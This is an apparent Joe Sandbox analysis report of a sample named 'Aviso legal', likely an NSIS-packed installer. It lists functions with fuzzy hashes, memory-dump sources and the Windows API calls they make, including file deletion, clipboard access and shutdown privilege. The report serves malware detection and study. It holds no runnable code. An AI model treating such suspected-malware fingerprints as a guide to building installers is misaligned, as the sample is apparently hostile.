Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7dfd0c5327569f287edc3cd79502b08eb065e798a5b9a811c71224f0e286a2f
Instruction ID: 854465c231592135362a6089eefcfcb25819c1c1e8e55ab531e0fa2dcf18c54b
Opcode Fuzzy Hash: e7dfd0c5327569f287edc3cd79502b08eb065e798a5b9a811c71224f0e286a2f
Instruction Fuzzy Hash: 481156B68003499FDB10CF9AC945BDEBFF8EF48320F108419E514A7250C375A994DFA5

Function 3611D4D8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6da7ee78e93a9bbcf871e2d947b2a777f217dd3585024a050b9c18555c6214fd
Instruction ID: 7ee0498cb5231c7ef0b4c5890c7f684c799e8365dd06ff75fd4debe2bc4fea0f
Opcode Fuzzy Hash: 6da7ee78e93a9bbcf871e2d947b2a777f217dd3585024a050b9c18555c6214fd
Instruction Fuzzy Hash: 5321FFB5D00219AFCB00CF9AD884ADEFFB8FB49220F50812AE518B7740C374A944CBA5

Function 36119E98 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd2d5f64989b31248e37ba40bc211bd954823ed3ebbd446f01c9e9eb1d08599c
Instruction ID: 71312abbe8b01262daf4a036922c6f63760baac3dd23e60b1b9d1aeace8142eb
Opcode Fuzzy Hash: dd2d5f64989b31248e37ba40bc211bd954823ed3ebbd446f01c9e9eb1d08599c
Instruction Fuzzy Hash: 831167B68043499FDB10CF9AC944BEEBFF4EF48320F10841AE518A7250D375A954CFA5

Function 3611DA58 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c618da3585c02a0c27ea73ea548ce9be5233c5cf030aabb4013f4f81c130966
Instruction ID: b5353dcb84d01567fe2330aee22546d733d3d1164a05997316b17f95bc641a23
Opcode Fuzzy Hash: 5c618da3585c02a0c27ea73ea548ce9be5233c5cf030aabb4013f4f81c130966
Instruction Fuzzy Hash: 2A01DF35F040111BEB21D66DE81575BA7DADBC8761F20C83BE10AC73A0DA66CC028785

Function 3611A9A8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7027810249c1fb0905a516898ae75387651aebf3721d1f14de0e6d9b8c1bdcad
Instruction ID: d76ba01a5825867523c288dedc246280fc27df5f01c86bc9e4d56d90f326f362
Opcode Fuzzy Hash: 7027810249c1fb0905a516898ae75387651aebf3721d1f14de0e6d9b8c1bdcad
Instruction Fuzzy Hash: A221E0B5D00219AFDB00DF9AD884B9EFBB8FB49210F50852AE518B7240C374A954CBA5

Function 36113C38 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e879fbcd6b416654e14195b7b67826b4c8083681dc8975c212a6980143ddc76e
Instruction ID: c2e7a80d8324b5621d66bf18e82983d197bb5eba160fbf6525ab230514601537
Opcode Fuzzy Hash: e879fbcd6b416654e14195b7b67826b4c8083681dc8975c212a6980143ddc76e
Instruction Fuzzy Hash: 7111D631A102048BDB10EFA5CC45B8ABBA6EF88310F94C575D84C5B29AEBB5DD45CBA1

Function 3611A31E Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8edf28417db6c58633775f3cf16fe4cb884c257cab05464c2a098ac7e9663cdf
Instruction ID: b9ada7f9b6b3fdbd89e0b92441dbd002ca059e5fb223de23575bd414691d4c34
Opcode Fuzzy Hash: 8edf28417db6c58633775f3cf16fe4cb884c257cab05464c2a098ac7e9663cdf
Instruction Fuzzy Hash: 51016832304344AFCF0A9FB88C105AF3FA7EFCA610B04446AEA05E7291DA354C1687A2

Function 3611D80F Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1850a30d8a91daee278ee3ff8cc771b18349c78aa1a7cbb880a206505c310941
Instruction ID: 0daa265207641566d0b4f53479ca72173d893b470d3b440b8fa839139c2d3013
Opcode Fuzzy Hash: 1850a30d8a91daee278ee3ff8cc771b18349c78aa1a7cbb880a206505c310941
Instruction Fuzzy Hash: 0F018F36F101285BEB449AA9C8157EF7BEAABC8364F40407AD506E7380EF64DC039BD1

Function 3611DA68 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb3b8819f7e12ab7bbfc9b96dd43cfdefd6f7c668866e5c5e2ca72f508e24aab
Instruction ID: a1b9b6f8c3e1674b62f0258167e03094e4966bcbf0d898212c122d47f7c650d8
Opcode Fuzzy Hash: eb3b8819f7e12ab7bbfc9b96dd43cfdefd6f7c668866e5c5e2ca72f508e24aab
Instruction Fuzzy Hash: 3E018135F040111BEB14D66DD415B1BB7DADBC9761F20C83BE50AC7391EA66DC028795

Function 36111000 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab1dc0d4e3e535ba0ff896d160da9ccaec4a6bc624db193715a6024237a063a6
Instruction ID: 3d7ebc8850e2741d4d5839ff1f5841dc30203b26454f7824d1bc3e2c5c4e58a6
Opcode Fuzzy Hash: ab1dc0d4e3e535ba0ff896d160da9ccaec4a6bc624db193715a6024237a063a6
Instruction Fuzzy Hash: 66010239B00104CFD744DB78D998A5DBBB2EF89315B5640A9E806DB3B0DB34AC92CB40

Function 36119A7E Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7da0d942844f14e78002605437be2262b0f73993cba8a0ed4f4bfc8368f293d
Instruction ID: 69f8ecda3dbcddefcdbf5e41c2ed2e90bd40ec91bd3f09ab83e485b538c5f069
Opcode Fuzzy Hash: d7da0d942844f14e78002605437be2262b0f73993cba8a0ed4f4bfc8368f293d
Instruction Fuzzy Hash: 69F04F35B011299FEB10CBA9D840BDEB7F1FF88326F148165E629A73D5C634E915CBA0

Function 3611A350 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8c9fccc70571f0602e5833a00a3d0249166d68983756333c51dcf1d860fdd0e
Instruction ID: f5695876127a47fe102205344eee07096fd8405e7c973bf4bb701d56b0e301b8
Opcode Fuzzy Hash: f8c9fccc70571f0602e5833a00a3d0249166d68983756333c51dcf1d860fdd0e
Instruction Fuzzy Hash: 13F08237700218AFDF059E99DC419AF7BEBEBC8660B00442AF619E3250DA325D21A7A5

Function 361175B4 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 348adfdfd983864687fd078687949afd68a849e076f5c5baf2997435105f24c7
Instruction ID: 13efe920330a1c6b156060810c03b3b018030211cd84464e1f6639ef92e6ed16
Opcode Fuzzy Hash: 348adfdfd983864687fd078687949afd68a849e076f5c5baf2997435105f24c7
Instruction Fuzzy Hash: D1F0A7B5540140AFDB40CBB4DCC8FEBBBADFBC5715B1581DAE0498A407C6349956C3A0

Function 36119B61 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a412f291c74a1cb093d6578cac0672c39fded8a1851d0ec3f4e09dd5eec618b5
Instruction ID: 88203fc9e8f755dfe676bba37d3e4ef3843ffc671f516b5b28317aaeeb06db4f
Opcode Fuzzy Hash: a412f291c74a1cb093d6578cac0672c39fded8a1851d0ec3f4e09dd5eec618b5
Instruction Fuzzy Hash: 5AE06D76E1022A9FD740DFBD9D4069EBBF8AB48654F508831D95AE7301F631CA1087D1

Function 36119B70 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe1ea5fef77b0f7b6dcfadf4ea648ef345274532ddb543ac8150873fcdd629e
Instruction ID: 9a17aef9c626833ba3f67c5c49c842053bdc04c26112a5133940f73817a0674b
Opcode Fuzzy Hash: 2fe1ea5fef77b0f7b6dcfadf4ea648ef345274532ddb543ac8150873fcdd629e
Instruction Fuzzy Hash: E6E04FB5E102199FDB40DFB99C0069F7BF9EB48650F108876D91AE7200F731CA108BD1

Non-executed Functions

Function 0040352D Relevance: 75.7, APIs: 33, Strings: 10, Instructions: 450stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008001), ref: 00403550
GetVersionExW.KERNEL32(?), ref: 00403579
GetVersionExW.KERNEL32(0000011C), ref: 00403590
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
OleInitialize.OLE32(00000000), ref: 0040366A
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
CharNextW.USER32(00000000,00440000,?,00440000,00000000), ref: 004036D6
GetTempPathW.KERNEL32(00000400,00442800,00000000,?), ref: 00403809
GetWindowsDirectoryW.KERNEL32(00442800,000003FB), ref: 0040381A
lstrcatW.KERNEL32(00442800,\Temp), ref: 00403826
GetTempPathW.KERNEL32(000003FC,00442800,00442800,\Temp), ref: 0040383A
lstrcatW.KERNEL32(00442800,Low), ref: 00403842
SetEnvironmentVariableW.KERNEL32(TEMP,00442800,00442800,Low), ref: 00403853
SetEnvironmentVariableW.KERNEL32(TMP,00442800), ref: 0040385B
DeleteFileW.KERNEL32(00442000), ref: 0040386F
lstrcatW.KERNEL32(00442800,~nsu), ref: 00403956
lstrcatW.KERNEL32(00442800,0040A26C), ref: 00403965

Part of subcall function 00405AEB: CreateDirectoryW.KERNEL32(?,00000000,00403520,00442800,00442800,00442800,00442800,00442800,00403810), ref: 00405AF1

lstrcatW.KERNEL32(00442800,.tmp), ref: 00403970
lstrcmpiW.KERNEL32(00442800,00441800,00442800,.tmp,00442800,~nsu,00440000,00000000,?), ref: 0040397C
SetCurrentDirectoryW.KERNEL32(00442800,00442800), ref: 0040399C
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
OleUninitialize.OLE32(?), ref: 00403A5E
ExitProcess.KERNEL32 ref: 00403A78
GetCurrentProcess.KERNEL32(?,?), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
ExitProcess.KERNEL32 ref: 00403B0C

Strings

TMP, xrefs: 00403856
Low, xrefs: 0040383C
~nsu, xrefs: 0040394E
TEMP, xrefs: 0040384E
Error launching installer, xrefs: 004038FF
SeShutdownPrivilege, xrefs: 00403AA1
\Temp, xrefs: 00403820
UXTHEME, xrefs: 0040361B, 00403620, 00403626
.tmp, xrefs: 0040396A
NSIS Error, xrefs: 0040368E

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-3195845224
Opcode ID: 6c3bd8c22d6e18a8b5ab610896a1dc0f2008672ff6007d1aefcbe699feda6b26
Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
Opcode Fuzzy Hash: 6c3bd8c22d6e18a8b5ab610896a1dc0f2008672ff6007d1aefcbe699feda6b26
Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D

Function 00405C49 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,75E03420,00442800,00000000), ref: 00405C72
lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75E03420,00442800,00000000), ref: 00405CE3
FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75E03420,00442800,00000000), ref: 00405CF3
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
FindClose.KERNEL32(00000000), ref: 00405DA2

Strings

\*.*, xrefs: 00405CB4
., xrefs: 00405D04
., xrefs: 00405D18

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$\*.*
API String ID: 2035342205-3749113046
Opcode ID: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
Opcode Fuzzy Hash: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE

Function 00401941 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: bc4df8e81a0b14d1d477a4514362ce605687270692fda74298e62d60ca7dec09
Instruction ID: 028d895594f26b516b6e28c9bae7941772c95648510da5ab605f38b5f47e1c04
Opcode Fuzzy Hash: bc4df8e81a0b14d1d477a4514362ce605687270692fda74298e62d60ca7dec09
Instruction Fuzzy Hash: 4CC01273B082149BDB01EBFDA945D8E7364DB813783208637E111F50D1D579C5115A29

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 0040573C
GetDlgItem.USER32(?,000003EE), ref: 0040574B
GetClientRect.USER32(?,?), ref: 00405788
GetSystemMetrics.USER32(00000002), ref: 0040578F
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
ShowWindow.USER32(?,?), ref: 0040582B
GetDlgItem.USER32(?,000003EC), ref: 0040584C
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
GetDlgItem.USER32(?,000003F8), ref: 0040575A

Part of subcall function 004044CE: SendMessageW.USER32(?,?,00000001,004042F9), ref: 004044DC

GetDlgItem.USER32(?,000003EC), ref: 0040589E
CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
CloseHandle.KERNEL32(00000000), ref: 004058B3
ShowWindow.USER32(00000000), ref: 004058D7
ShowWindow.USER32(?,?), ref: 004058DC
ShowWindow.USER32(?), ref: 00405926
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
CreatePopupMenu.USER32 ref: 0040596B
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
GetWindowRect.USER32(?,?), ref: 0040599F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
OpenClipboard.USER32(00000000), ref: 00405A00
EmptyClipboard.USER32 ref: 00405A06
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
GlobalLock.KERNEL32(00000000), ref: 00405A1C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
GlobalUnlock.KERNEL32(00000000), ref: 00405A50
SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
CloseClipboard.USER32 ref: 00405A61

Strings

{, xrefs: 00405944

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58

Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F1E
GetDlgItem.USER32(?,00000408), ref: 00404F29
GlobalAlloc.KERNEL32(?,?), ref: 00404F73
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
SetWindowLongW.USER32(?,?,00405513), ref: 00404FA3
ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404FB7
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404FFD
DeleteObject.GDI32(00000000), ref: 00405000
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102

Part of subcall function 004044CE: SendMessageW.USER32(?,?,00000001,004042F9), ref: 004044DC

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
GetWindowLongW.USER32(?,?), ref: 00405144
SetWindowLongW.USER32(?,?,00000000), ref: 00405152
ShowWindow.USER32(?,00000005), ref: 00405162
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
SendMessageW.USER32(?,?,00000000,00000000), ref: 004052D7
SendMessageW.USER32(?,00000420,00000000,?), ref: 004052FB
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
ImageList_Destroy.COMCTL32(?), ref: 00405330
GlobalFree.KERNEL32(?), ref: 00405340
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
SendMessageW.USER32(?,00001102,?,?), ref: 00405462
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
ShowWindow.USER32(?,00000000), ref: 004054EA
GetDlgItem.USER32(?,000003FE), ref: 004054F5
ShowWindow.USER32(00000000), ref: 004054FC

Strings

M, xrefs: 004050BA
, xrefs: 004054D4
N, xrefs: 0040519B

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
